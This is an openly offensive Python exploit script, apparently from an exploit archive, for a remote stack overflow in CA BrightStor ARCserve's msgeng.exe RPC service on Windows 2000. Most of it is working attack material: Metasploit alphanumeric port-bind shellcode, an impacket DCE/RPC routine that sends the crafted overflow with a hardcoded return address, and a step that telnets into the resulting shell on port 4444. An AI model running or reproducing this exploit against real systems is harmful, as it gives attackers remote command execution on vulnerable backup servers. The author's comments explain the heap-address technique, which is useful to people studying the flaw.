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CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit
================================================================= CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit ================================================================= #!/usr/bin/python # This one was listed in the SANS TOP 20 and I needed an exploit for analysis. # I couldnt find a reliable exploit for my analysis and so came up with this. # Remote exploit for the CA BrightStor msgeng.exe service stack overflow # vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was # tested on windows 2000 SP4 in a VMware environment. # Opens a shell on TCP port 4444. # # Though a stack overflow vulnerability caused due to strcpy, this vulnerability # provides an interesting case. Unlike a traditional stack overflow where the # user supplies the overflow data which immediately is copied into a stack # based buffer, here the user supplied data is stored in the heap and the first # DWORD of the RPC stub is used as the source address in the strcpy operation. # This means we have to locate the address of our shellcode on the heap and then # craft the first DWORD of the stub in such a way that when strcpy is called our # buffer is the source. I had problems locating the shellcode in the heap, # because each time I ran the exploit the shellcode would be in different places # , obviously (0008xxxx or 0009xxxx or 000Axxxx). However when sending very # large data of around 500000 bytes I saw that along with one of the likely # locations it was always available at the address 011E0070 aswell. Atleast on # the setup I have for analysis this address does not have anything useful if # buffer sizes of 1k, 2k etc are used. Once we get the address straight, there # after its a straight forward stack overflow that can overwrite EIP. # # This exploit binds shell to TCP port 4444 and connects to it # # Author shall bear no responsibility for any screw ups caused by using the code # Winny M Thomas ;-) from impacket.dcerpc import transport, dcerpc from impacket import uuid import struct import time import sys import os #alphanumeric portbind shellcode from metasploit. Binds shell to port 4444 shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" def DCEconnectAndExploit(target): trans = transport.TCPTransport(target, 6503) trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0'))) # The following DWORD gets converted to an address pointing into our # buffer. request = struct.pack('<L', 0x00003A7C) request += "A" * 19608 request += "\x90\x90\xeb\x06" # At the point of overflow EBX points to our shellcode # Address of 'call ebx' from kernel32.dll SP4 request += struct.pack('<L', 0x7C577B03) request += "\x90\x90\x90\x90" request += shellcode request += "b" * 480000 dce.call(45, request) def ConnectRemoteShell(target): connect = "/usr/bin/telnet " + target + " 4444" os.system(connect) if __name__ == '__main__': try: target = sys.argv[1] except IndexError: print 'Usage: %s <target ip>\n' % sys.argv[0] sys.exit(-1) DCEconnectAndExploit(target) print 'Exploit sent to: %s' % target print 'Connecting to %s:4444' % target time.sleep(3) ConnectRemoteShell(target) # 0day.today [2024-11-16] #